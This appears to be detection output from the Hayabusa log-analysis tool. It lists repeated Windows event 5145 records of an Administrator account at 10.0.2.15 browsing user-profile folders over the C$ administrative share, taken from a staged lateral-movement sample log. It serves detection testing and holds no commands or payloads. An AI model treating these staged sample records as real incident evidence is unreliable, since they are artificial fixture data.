Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Saved Games : IP Address: 